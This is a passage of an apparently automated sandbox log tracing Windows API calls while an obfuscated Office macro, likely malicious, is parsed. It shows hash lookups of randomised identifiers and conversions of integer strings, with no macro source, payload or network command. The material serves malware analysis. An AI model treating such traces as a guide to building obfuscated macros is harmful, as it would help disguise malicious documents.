lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.916] VarI4FromStr (in: strIn="632169290", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W_DcGxGA") returned 0x104358 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAoAQBAo") returned 0x101ae9 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jkQ_AA") returned 0x10d0ea [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KXkwDGD") returned 0x10f6f8 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NU1UcACA") returned 0x10e0d8 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lBGBAX") returned 0x108974 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="l4_AAAZ") returned 0x102bba [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAADAA4") returned 0x10cb9c [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SAAAAGQ") returned 0x10f0eb [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAUAAD") returned 0x10d850 [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FZUAGA") returned 0x107a04 [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XwAk1D") returned 0x108b97 [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jC_QwoA") returned 0x10cd9a [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zoA1AZ") returned 0x103300 [0067.917] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.918] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd3b10, cb=0x1200) returned 0xafd3b10 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hBcQDcCX") returned 0x10696b [0067.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.918] VarI4FromStr (in: strIn="768425956", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oZ_AAkD") returned 0x1042cf [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JcoUAB4") returned 0x10537d [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cDAAxAQ") returned 0x10c264 [0067.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.918] VarI4FromStr (in: strIn="205219535", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] VarI4FromStr (in: strIn="707215912", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] VarI4FromStr (in: strIn="256542314", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] VarI4FromStr (in: strIn="944509492", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] VarI4FromStr (in: strIn="536109481", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D_DBZDA") returned 0x10e580 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fwAGG1D") returned 0x105710 [0067.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.918] VarI4FromStr (in: strIn="794031534", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] VarI4FromStr (in: strIn="393645065", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L_ACZAAQ") returned 0x10384f [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.918] VarI4FromStr (in: strIn="408790456", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] VarI4FromStr (in: strIn="103151604", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.918] VarI4FromStr (in: strIn="947602380", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] VarI4FromStr (in: strIn="76304379", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.918] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.919] VarI4FromStr (in: strIn="609646463", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAxkBQDQ") returned 0x104640 [0067.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.919] VarI4FromStr (in: strIn="542737468", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZBAA_Q") returned 0x1023ed [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zkAoAB") returned 0x108ba0 [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sABAGA_B") returned 0x102e9f [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAUkkDwA") returned 0x10bd57 [0067.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.919] VarI4FromStr (in: strIn="228768109", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] CExposedStream::Read () returned 0x0 [0067.919] CExposedStream::Read () returned 0x0 [0067.919] VarI4FromStr (in: strIn="67424762", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] VarI4FromStr (in: strIn="748421918", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] VarI4FromStr (in: strIn="568094426", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] VarI4FromStr (in: strIn="809964968", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] VarI4FromStr (in: strIn="640780", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] VarI4FromStr (in: strIn="560166547", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] VarI4FromStr (in: strIn="621435931", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.919] VarI4FromStr (in: strIn="383020766", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="938135162", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="338610726", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="290452530", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="41201307", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="61467156", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="463786599", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="496058466", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="167454855", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="555692661", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="461712225", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="103774690", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="833888369", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="249198505", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="751720167", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="778072829", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="285481900", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="478402458", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="677261198", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="119187596", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf54180, cb=0x200) returned 0x64fcbb0 [0067.920] VarI4FromStr (in: strIn="776691846", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.920] VarI4FromStr (in: strIn="735395189", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="167905230", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="6777666", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="938963518", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="91451065", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="851349184", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="416958859", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="304806431", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="823137407", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="440145965", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="653147015", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="165847916", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="787342760", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="827313162", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="923714490", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="777212275", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="451596468", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="8036563", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="669921400", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.921] VarI4FromStr (in: strIn="908252597", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="491911384", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="689251177", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="519246138", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="392030727", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="134742182", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="341861927", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="526972145", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="288712398", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="444894037", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="205088164", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="816198675", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="228096801", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="844576063", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="652622217", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="521769504", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="754980862", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="904908510", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="446458296", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="638163834", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="214925415", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="222909992", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="246921746", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.922] VarI4FromStr (in: strIn="189200899", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="371061578", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="771427156", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="921624839", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="998509735", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="500406995", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="638177895", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="703586990", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="936203114", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="24323649", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="20679235", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="277196601", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="524994281", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="872295301", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="222116037", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="955729010", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="671235885", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="723048477", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="981922377", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.923] VarI4FromStr (in: strIn="531999790", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="164929467", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="381916784", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.923] VarI4FromStr (in: strIn="756458808", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.924] VarI4FromStr (in: strIn="633628509", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.924] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd3b10, cb=0x2400) returned 0xafd3b10 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="J_kcD1A4") returned 0x10c79f [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mADwAx") returned 0x1027f8 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.924] CExposedStream::Read () returned 0x0 [0067.924] CExposedStream::Read () returned 0x0 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tD_DAAw") returned 0x10d675 [0067.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAUUkG") returned 0x10fa2a [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aAkQA4") returned 0x10649e [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hADDBxXA") returned 0x10b7a3 [0067.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sXwA1CxA") returned 0x1094f6 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BZQwDQB") returned 0x106a91 [0067.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HcBAAGZ") returned 0x10fab6 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ik_wBA") returned 0x105999 [0067.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bQAZAG_B") returned 0x10c6c3 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MUAACA") returned 0x10cd53 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GXkk_cG") returned 0x101882 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HXAwGDA") returned 0x109bd8 [0067.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DCAUcACA") returned 0x10f83f [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PUAC__A4") returned 0x10496f [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NXADZAA") returned 0x109951 [0067.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lG__k1ZC") returned 0x101452 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d 